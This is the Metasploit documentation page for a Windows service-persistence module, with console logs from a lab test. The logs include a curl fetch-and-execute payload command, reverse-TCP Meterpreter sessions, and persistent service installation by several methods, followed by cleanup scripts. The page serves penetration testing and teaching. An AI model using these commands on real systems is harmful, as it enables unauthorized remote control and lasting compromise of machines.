Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/persistence/service.md
27917 views

Description

This Module will generate and upload an executable to a remote host, next will make it a persistent service. It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required.

Options

PAYLOAD_NAME

Name of payload file to write. Random string as default.

SERVICE_NAME

The name of service. Random string as default.

SERVICE_DESCRIPTION

The description of service. Random string as default.

SERVICE_DISPLAY_NAME

The display name of service. Random string as default.

METHOD

Which method to use to create and start the service. Options are Auto (try all until one is successful), API, Powershell, sc.exe

Verification Steps

  1. get session on target with admin/system privs

  2. use exploit/windows/persistence/service

  3. set payload <payload>

  4. set lport <lport>

  5. set lhost <lhost>

  6. exploit

Scenarios

Windows 10 1909 (10.0 Build 18363)

Initial shell

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe

[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Starting persistent handler(s)...
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450 
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49801) at 2025-11-05 16:15:06 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...

Method: sc.exe

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/service
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/service) > set session 1
session => 1
msf exploit(windows/persistence/service) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/service) > set method sc.exe
method => sc.exe
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf exploit(windows/persistence/service) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\nAhKD.exe
[*] Attempting sc.exe method
[*] Install service: amOovON (YmGjSOMpyNU)
[*] Service install response: [SC] CreateService SUCCESS
[*] [SC] ChangeServiceConfig2 SUCCESS
[*] Starting service
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Service start response: 
SERVICE_NAME: YmGjSOMpyNU 
        TYPE               : 10  WIN32_OWN_PROCESS  
        STATE              : 4  RUNNING 
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 6664
        FLAGS              : 
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49831) at 2025-11-05 16:30:40 -0500

msf exploit(windows/persistence/service) > jobs -K
Stopping all jobs...

Method: Powershell

msf exploit(windows/persistence/service) > set method Powershell
method => Powershell
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf exploit(windows/persistence/service) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\ShNuFKol.exe
[*] Attempting Powershell method
[*] Install service: eIOICL (mpSlHnVCx)
[*] Service install response: 
Status   Name               DisplayName                           
------   ----               -----------                           
Stopped  mpSlHnVCx          eIOICL                                


[*] Starting service
[*] Service start response: 
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:49833) at 2025-11-05 16:31:22 -0500

msf exploit(windows/persistence/service) > jobs -K
Stopping all jobs...

Method: API

msf exploit(windows/persistence/service) > set method API
method => API
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/service) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\ETuJrSPU.exe
[*] Attempting API method
[*] Install service: vElWSh (krKyTZyQvSWg)
[*] Service install code: 0
[*] Starting service
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Service start code: 0
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc
[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:49834) at 2025-11-05 16:31:41 -0500

Method: Auto

msf exploit(windows/persistence/service) > set method Auto
method => Auto
msf exploit(windows/persistence/service) > exploit
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/service) > 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable
[*] Compiling payload
[+] Payload written to C:\Users\windows\AppData\Local\Temp\xuGMR.exe
[*] Attempting API method
[*] Install service: cbuEWFVI (NzbjSkwfZrk)
[*] Service install code: 0
[*] Starting service
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Service start code: 0
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc
[*] Meterpreter session 5 opened (1.1.1.1:4444 -> 2.2.2.2:49835) at 2025-11-05 16:32:06 -0500

Cleanup

msf exploit(windows/persistence/service) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\nAhKD.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> execute -H -f sc.exe -a "stop YmGjSOMpyNU"
Process 2812 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3037/WIN10PROLICENSE_20251105.3037.rc)> execute -H -f sc.exe -a "delete YmGjSOMpyNU"
Process 4140 created.
meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\ShNuFKol.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> execute -H -f sc.exe -a "stop mpSlHnVCx"
Process 680 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3118/WIN10PROLICENSE_20251105.3118.rc)> execute -H -f sc.exe -a "delete mpSlHnVCx"
Process 8940 created.
meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\ETuJrSPU.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> execute -H -f sc.exe -a "stop krKyTZyQvSWg"
Process 3660 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3137/WIN10PROLICENSE_20251105.3137.rc)> execute -H -f sc.exe -a "delete krKyTZyQvSWg"
Process 1728 created.
meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> rm "C:\\Users\\windows\\AppData\\Local\\Temp\\xuGMR.exe"
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> execute -H -f sc.exe -a "stop NzbjSkwfZrk"
Process 3448 created.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251105.3203/WIN10PROLICENSE_20251105.3203.rc)> execute -H -f sc.exe -a "delete NzbjSkwfZrk"
Process 9020 created.
meterpreter > exit
[*] Shutting down session: 1